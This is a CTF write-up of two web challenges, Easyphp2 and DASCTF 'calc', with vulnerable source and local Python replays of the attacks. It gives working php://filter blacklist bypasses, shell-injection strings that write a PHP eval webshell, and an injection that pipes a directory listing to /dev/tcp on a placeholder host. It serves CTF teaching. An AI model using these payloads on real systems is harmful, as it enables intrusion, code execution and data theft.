BUUCTC(33)



[羊城杯 2020]Easyphp2

convert.quoted-printable-encode & convert.quoted-printable-decode

The blacklist is bypassed here with double URL encoding: PHP turns `%25xx` into `%xx` when it parses the query string, and the php://filter wrapper URL-decodes the filter name once more, so `%2562%2561%2573%2565%2536%2534-encode` reaches the stream layer as `base64-encode` while the literal string `base64` never appears in the request.

/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
/?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php

Other methods

?file=php://filter/read=convert.iconv.utf-8.utf-16be/resource=GWHT.php

Converting to UTF-16BE puts a NUL byte in front of every ASCII character, so the `<?php` open tag no longer occurs in the output as a byte sequence and the file contents come back as plain bytes instead of being interpreted.
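As an added illustration (not part of the original writeup), the following Python models the two decoding passes the filter name goes through and shows how the leaked output of each read filter is turned back into source. The blacklist on the `file` parameter is an assumption, since the page does not show it, the sample file contents are constructed, and the PHP-side encodings are approximated with Python's base64, quopri and codec modules:

```python
import base64
import quopri
import re
import urllib.parse

# Constructed sample file contents; the real GWHT.php is not on the page.
SAMPLE_SOURCE = "<?php\n$secret = 'constructed-sample';\necho 1 + 1;\n"

# Assumed blacklist on the file parameter (the page does not show the real one).
FILE_BLACKLIST = re.compile(r"base64|rot13|base32|base16", re.I)


def build_filter_url(filter_name: str, resource: str = "GWHT.php") -> str:
    """Double URL-encode a php://filter name so no blacklisted token is visible.

    PHP decodes %25xx -> %xx while parsing the query string, and the php://filter
    wrapper URL-decodes each filter name again, so two layers survive the trip.
    """
    once = "".join(f"%{b:02X}" for b in filter_name.encode())   # %62%61%73...
    twice = urllib.parse.quote(once, safe="")                    # %2562%2561...
    return f"/?file=php://filter/read=convert.{twice}/resource={resource}"


def decode_like_php(url: str) -> str:
    """Replay the two decoding passes the server applies to the filter name."""
    query_value = url.split("?file=", 1)[1]
    in_get = urllib.parse.unquote(query_value)  # what $_GET['file'] holds
    return urllib.parse.unquote(in_get)         # what php://filter works with


def simulate_leak(filter_name: str, source: str = SAMPLE_SOURCE) -> bytes:
    """Approximate what each read filter emits (Python stand-ins for PHP's)."""
    raw = source.encode()
    if filter_name == "base64-encode":
        return base64.b64encode(raw)
    if filter_name == "quoted-printable-encode":
        return quopri.encodestring(raw)
    if filter_name == "iconv.utf-8.utf-16be":
        return source.encode("utf-16-be")
    raise ValueError(f"unsupported filter {filter_name!r}")


def recover_source(leaked: bytes, filter_name: str) -> str:
    """Undo the transformation so the leaked bytes read as the original file."""
    if filter_name == "base64-encode":
        return base64.b64decode(leaked).decode()
    if filter_name == "quoted-printable-encode":
        return quopri.decodestring(leaked).decode()
    if filter_name == "iconv.utf-8.utf-16be":
        return leaked.decode("utf-16-be")
    raise ValueError(f"unsupported filter {filter_name!r}")


if __name__ == "__main__":
    url = build_filter_url("base64-encode")
    print(url)
    print("blacklist hit:", bool(FILE_BLACKLIST.search(url)))
    print("server sees:", decode_like_php(url))
    for name in ("base64-encode", "quoted-printable-encode", "iconv.utf-8.utf-16be"):
        leaked = simulate_leak(name)
        print(name, "-> '<?php' visible in output:", b"<?php" in leaked)
        assert recover_source(leaked, name) == SAMPLE_SOURCE
```

Running it prints the double-encoded URL, confirms the assumed blacklist does not match it, shows the fully decoded filter name the wrapper ends up with, and round-trips the sample source through each of the three filters.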

 

Source code

 <?php
    if (isset($_GET["count"])) {
        $count = $_GET["count"];
        // Blacklist on $count. The open tag is matched as <\?php, so the short
        // echo tag <?= is not caught.
        if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
        	die('hacker!');
        }
        // $count is spliced into a shell command between single quotes, so a
        // single quote in the input breaks out of printf's argument.
        echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
    }
    ?>
 

 

dirsearch turns up robots.txt, which gives the hint `Disallow: /?file=check.php`.

Capturing the request shows a `pass` parameter; set its value to GWHT.

The challenge filters `<?php`, so the webshell is written with the short echo tag `<?=` instead:

<?= eval($_POST['wind'])?>
?file=GWHT.php&count='|echo "<?= eval(\$_POST['wind'])?>" > a.php||'

The leading `'` closes printf's single-quoted argument, `|echo ... > a.php` writes the webshell, and the trailing `||'` turns the server's own `' | wc -c` into an alternative branch that never runs because echo succeeded. The `$` is escaped because the echo argument sits in shell double quotes, where an unescaped `$_POST` would be expanded to an empty string.
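Added example (not from the original writeup): a Python model of the vulnerable endpoint above that runs the injected command through `sh -c` in a scratch directory, as PHP's exec() does, and checks what lands in a.php. It shows why the `$` has to be escaped: inside the shell's double quotes an unescaped `$_POST` is expanded to an empty string. The helper names are illustrative; the blacklist and the command string are transcribed from the PHP source.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Blacklist on $count, transcribed from the PHP source above.
COUNT_BLACKLIST = re.compile(r";|base64|rot13|base32|base16|<\?php|#", re.I)


def build_command(count: str) -> str:
    """Same string building as exec('printf \\'' . $count . '\\' | wc -c')."""
    return "printf '" + count + "' | wc -c"


def run_count(count: str, workdir=None) -> tuple:
    """Model the endpoint: blacklist check, then /bin/sh -c like PHP's exec().

    Returns (accepted, command output); rejected input gives (False, 'hacker!').
    """
    if COUNT_BLACKLIST.search(count):
        return False, "hacker!"
    proc = subprocess.run(["sh", "-c", build_command(count)], cwd=workdir,
                          capture_output=True, text=True)
    return True, proc.stdout.strip()


def webshell_payload(param: str, escape_dollar: bool) -> str:
    """The page's payload: a leading quote closes printf's argument, |echo writes
    the file, and the trailing ||' turns the server's ' | wc -c into a branch
    that never runs because echo succeeded."""
    dollar = "\\$" if escape_dollar else "$"
    return f"'|echo \"<?= eval({dollar}_POST['{param}'])?>\" > a.php||'"


def drop_webshell(escape_dollar: bool) -> str:
    """Fire the injection in a scratch directory and return what a.php contains."""
    with tempfile.TemporaryDirectory() as d:
        workdir = Path(d)
        accepted, _ = run_count(webshell_payload("wind", escape_dollar), workdir)
        if not accepted:
            return "hacker!"
        return (workdir / "a.php").read_text()


if __name__ == "__main__":
    print(repr(drop_webshell(escape_dollar=False)))  # $_POST eaten by the shell
    print(repr(drop_webshell(escape_dollar=True)))   # intact webshell
```

The unescaped variant leaves `<?= eval(['wind'])?>` on disk, which is not a working webshell; the escaped one writes the tag exactly as intended. `run_count` also confirms that a value containing `a.php` passes the blacklist while `<?php` does not.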

The README under the GWHT directory contains a hash.

Cracking it gives GWHTCTF, the password of user GWHT.

Finally, through the webshell:

wind=system("printf 'GWHTCTF' | su GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'");

2022DASCTF X SU March Spring Challenge: calc

The source code is provided:

import os
import time

from flask import Flask, render_template, request

app=Flask(__name__)
def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag

@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")
@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    # num is interpolated unquoted into a shell command line ...
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)

    if waf(num):
        try:
            data = eval(num)  # must succeed before the log line is executed
            os.system(log)    # ... which is then handed to /bin/sh
        except:
            pass
        return str(data)
    else:
        return "waf!!"

if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)

A quick look: the blacklist blocks the usual keywords and even both parentheses, so command execution through `eval` itself is a dead end.

Idea: `num` is also formatted into the `log` string, which goes to `os.system`, so a shell command placed in `num` is executed by the shell.

Note that `eval(num)` runs first and must not throw, so the command is placed after a `#`: Python treats it as a comment, but the shell does not, because a `#` that is not at the start of a word does not begin a shell comment.

payload

1#`ls`

eval() returns 1, and the shell then runs `echo <time> <ip> 1#`ls`> ./tmp/log.txt`, where the backticks substitute the output of ls. Then exfiltrate the contents of ./tmp/log.txt.

Another method. Idea:

1. On the Python side the whole value is a triple-quoted string literal, so eval() succeeds whatever shell syntax it contains.

2. On the shell side the single quotes pair up again (`'''2'` is an empty string followed by `'2'`), so the first line is just a harmless echo.

3. A `#` at the start of the last line turns the remainder, including the server's `> ./tmp/log.txt` redirection, into a shell comment.

payload

'''2'
ls>/dev/tcp/x.x.x.x/port
#'3'''> ./tmp/log.txt

The trailing `> ./tmp/log.txt` is appended by the server's format string rather than sent as part of `num`; it is shown here to make clear what the `#` comments out. Because spaces and `;` are blacklisted, newlines (`%0a` in the URL) separate the shell commands and take the place of spaces, and the redirection is written as `ls>/dev/tcp/...` with no space. `/dev/tcp` is a bash feature, so this variant only works where the /bin/sh that os.system invokes is bash.
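Added example (not from the original writeup) covering both payloads above: a stripped-down Python model of the /calc handler that applies the same blacklist, eval()s `num`, and then runs the log line through `sh -c` in a scratch directory containing a constructed `flag.txt`. The `/dev/tcp/x.x.x.x/port` target of the second payload is replaced by a local file so the example runs offline; the rest of both payloads is as on the page.

```python
import subprocess
import tempfile
import time
from pathlib import Path

# Blacklist copied from the challenge source above.
BLACKLIST = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr',
             'os', 'system', 'class', 'subclasses', 'mro', 'request', 'args', 'eval',
             'if', 'subprocess', 'file', 'open', 'popen', 'builtins', 'compile',
             'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
             'getattribute', 'func_globals', '__init__', 'join', '__dict__']


def waf(s: str) -> bool:
    """True when no blacklisted token occurs (case-insensitive), as in the app."""
    return not any(word in s.lower() for word in BLACKLIST)


def calc(num: str, app_dir: Path, ip: str = "127.0.0.1") -> tuple:
    """Model of the /calc handler. Returns (response body, ./tmp/log.txt contents).

    Differences from the app: sh -c replaces os.system so the cwd can be chosen,
    and a failing eval() yields 'None' instead of the NameError the app raises.
    """
    if not waf(num):
        return "waf!!", ""
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(
        time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)
    data = None
    try:
        data = eval(num)  # the app's eval(); only constructed inputs go through here
        subprocess.run(["sh", "-c", log], cwd=app_dir, capture_output=True)
    except Exception:
        pass
    log_file = app_dir / "tmp" / "log.txt"
    return str(data), (log_file.read_text() if log_file.exists() else "")


def scratch_app_dir() -> Path:
    """Scratch copy of the app's working directory with a constructed flag file."""
    d = Path(tempfile.mkdtemp())
    (d / "tmp").mkdir()
    (d / "flag.txt").write_text("flag{constructed-sample}\n")
    return d


# Payload 1: Python sees "1" plus a comment; sh sees 1#`ls` and substitutes ls output,
# because a # in the middle of a word does not start a shell comment.
PAYLOAD_BACKTICK = "1#`ls`"

# Payload 2: a triple-quoted Python string whose second line is a shell command.
# The page sends the listing to /dev/tcp/x.x.x.x/port; a local file stands in here.
PAYLOAD_NEWLINE = "'''2'\nls>./tmp/out.txt\n#'3'''"


if __name__ == "__main__":
    d = scratch_app_dir()
    print(calc(PAYLOAD_BACKTICK, d))
    print(calc(PAYLOAD_NEWLINE, d))
    print((d / "tmp" / "out.txt").read_text())
```

With the first payload the response is `1` and the directory listing appears after `1#` inside ./tmp/log.txt; with the second, the response is the triple-quoted string, the listing is written to the substituted target, and the commented-out redirection means log.txt is not touched at all.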